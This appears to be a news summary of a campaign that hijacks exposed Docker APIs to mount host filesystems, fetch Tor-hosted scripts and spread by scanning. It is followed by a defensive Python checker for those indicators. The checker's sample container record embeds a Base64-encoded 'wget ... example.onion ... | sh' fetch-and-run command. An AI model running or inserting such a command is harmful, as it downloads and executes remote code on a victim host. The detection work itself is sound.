
"Akamai, which discovered the latest activity last month, said it's designed to block other actors from accessing the Docker API from the internet. The findings build on a prior report from Trend Micro in late June 2025, which uncovered a malicious campaign that targeted exposed Docker instances to stealthily drop an XMRig cryptocurrency miner using a TOR domain for anonymity."
"The attack chain essentially involves breaking into misconfigured Docker APIs to execute a new container based on the Alpine Docker image and mount the host file system into it. This is followed by the threat actors running a Base64-encoded payload to download a shell script downloader from a .onion domain. The script, besides altering SSH configurations to set up persistence, also installs other tools such as masscan, libpcap, libpcap-dev, zstd, and torsocks to conduct reconnaissance, contact a command-and-control (C2) server,"
Threat actors are exploiting exposed Docker APIs to start Alpine containers that bind-mount the host file system and run a Base64-encoded payload, which in turn fetches a shell-script downloader from a .onion domain. The downloader alters SSH configurations for persistence and installs reconnaissance and network tooling (masscan, libpcap, libpcap-dev, zstd, and torsocks) to contact a Tor-hosted C2 server and retrieve a compressed binary. The initial dropper is a Go binary that embeds its payload, parses utmp to identify logged-in users, and contains an emoji that may hint at LLM-assisted creation. According to Akamai, the malware also blocks other actors from reaching the Docker API from the internet, and it launches Masscan to find further open Docker APIs on port 2375 and propagate to other hosts.
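For defenders, the two things worth checking on a Docker host after reading the above are whether the Engine API is reachable over plain TCP, and whether any running container matches the chain described (an Alpine image with the host root bind-mounted and a command that pipes Base64-decoded data into a shell). The script below is an added example, not code from the article or from Akamai or Trend Micro. It works on the JSON that `docker inspect` (or the Engine API's `GET /containers/{id}/json`) returns, plus the contents of `/etc/docker/daemon.json`. The two embedded container records, the Base64 payload they carry, and the `example.onion` hostname are all constructed for illustration.

```python
import base64
import json
import re
import sys

# Constructed sample in the shape returned by `docker inspect`. Not data from the campaign.
_B64_PAYLOAD = base64.b64encode(b"wget -qO- http://example.onion/dl.sh | sh").decode()

SAMPLE_INSPECT = [
    {   # ordinary web container: named volume, no host root mount
        "Id": "aaa111", "Name": "/web",
        "Config": {"Image": "nginx:1.27", "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Binds": ["webdata:/usr/share/nginx/html:ro"], "Privileged": False},
        "Mounts": [{"Type": "volume", "Source": "webdata", "Destination": "/usr/share/nginx/html"}],
    },
    {   # constructed record matching the described chain: alpine, / bind-mounted, base64 | sh
        "Id": "bbb222", "Name": "/alpine_dropper",
        "Config": {"Image": "alpine", "Cmd": ["sh", "-c", f"echo {_B64_PAYLOAD} | base64 -d | sh"]},
        "HostConfig": {"Binds": ["/:/hostroot"], "Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/hostroot"}],
    },
]

# Runs of base64 alphabet long enough to be a payload rather than a flag or a word.
_B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def host_root_mounted(container):
    """True if the host's / is bind-mounted anywhere inside the container."""
    for m in container.get("Mounts", []):
        if m.get("Type") == "bind" and m.get("Source") == "/":
            return True
    for bind in container.get("HostConfig", {}).get("Binds") or []:
        if bind.startswith("/:"):
            return True
    return False


def decoded_base64_args(cmd):
    """Decode every base64-looking token in the container command; skip tokens that fail."""
    out = []
    for arg in cmd or []:
        for tok in _B64_RE.findall(arg):
            try:
                out.append(base64.b64decode(tok, validate=True).decode("utf-8"))
            except (ValueError, UnicodeDecodeError):
                continue
    return out


def assess_container(container):
    """Return the list of indicators from the described chain that this container matches."""
    findings = []
    cfg = container.get("Config", {})
    cmd = cfg.get("Cmd") or []
    joined = " ".join(cmd)
    if host_root_mounted(container):
        findings.append("host root filesystem bind-mounted into container")
    if container.get("HostConfig", {}).get("Privileged"):
        findings.append("privileged container")
    if "base64" in joined and ("-d" in joined or "--decode" in joined):
        findings.append("command pipes base64-decoded data into a shell")
    for text in decoded_base64_args(cmd):
        if ".onion" in text:
            findings.append(f"decoded payload references a .onion host: {text}")
        if any(tool in text for tool in ("torsocks", "masscan")):
            findings.append(f"decoded payload references Tor/scanning tooling: {text}")
    if findings and cfg.get("Image", "").split(":")[0] in ("alpine", "docker.io/library/alpine"):
        findings.append("minimal alpine image used as the execution vehicle")
    return findings


def flag_suspicious_containers(inspect_output):
    """Map container name -> findings for every container with at least one indicator."""
    return {c["Name"]: f for c in inspect_output if (f := assess_container(c))}


def daemon_config_exposes_api(daemon_json):
    """True if daemon.json binds the Engine API to TCP without requiring TLS client certs.

    `hosts` and `tlsverify` are the real daemon.json keys; the port (2375 vs 2376) is
    convention only, so the check keys on the transport and on tlsverify, not the port.
    """
    tcp_hosts = [h for h in daemon_json.get("hosts", []) if h.startswith("tcp://")]
    return bool(tcp_hosts) and not daemon_json.get("tlsverify", False)


if __name__ == "__main__":
    # Usage: docker inspect $(docker ps -q) | python3 docker_chain_check.py
    data = SAMPLE_INSPECT if sys.stdin.isatty() else json.load(sys.stdin)
    print(json.dumps(flag_suspicious_containers(data), indent=2))
```

The `.onion` and tooling checks only see what the payload decodes to at container-creation time; a payload that merely downloads a second stage, as in the reported chain, surfaces here only as a Tor reference and the `base64 -d | sh` pattern, so treat the host-root mount as the primary indicator and the others as corroboration. If `daemon_config_exposes_api` returns true, the fix is to bind the API to the Unix socket only, or to keep the TCP listener with `tlsverify` plus `tlscacert`, `tlscert` and `tlskey` set.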
Read at The Hacker News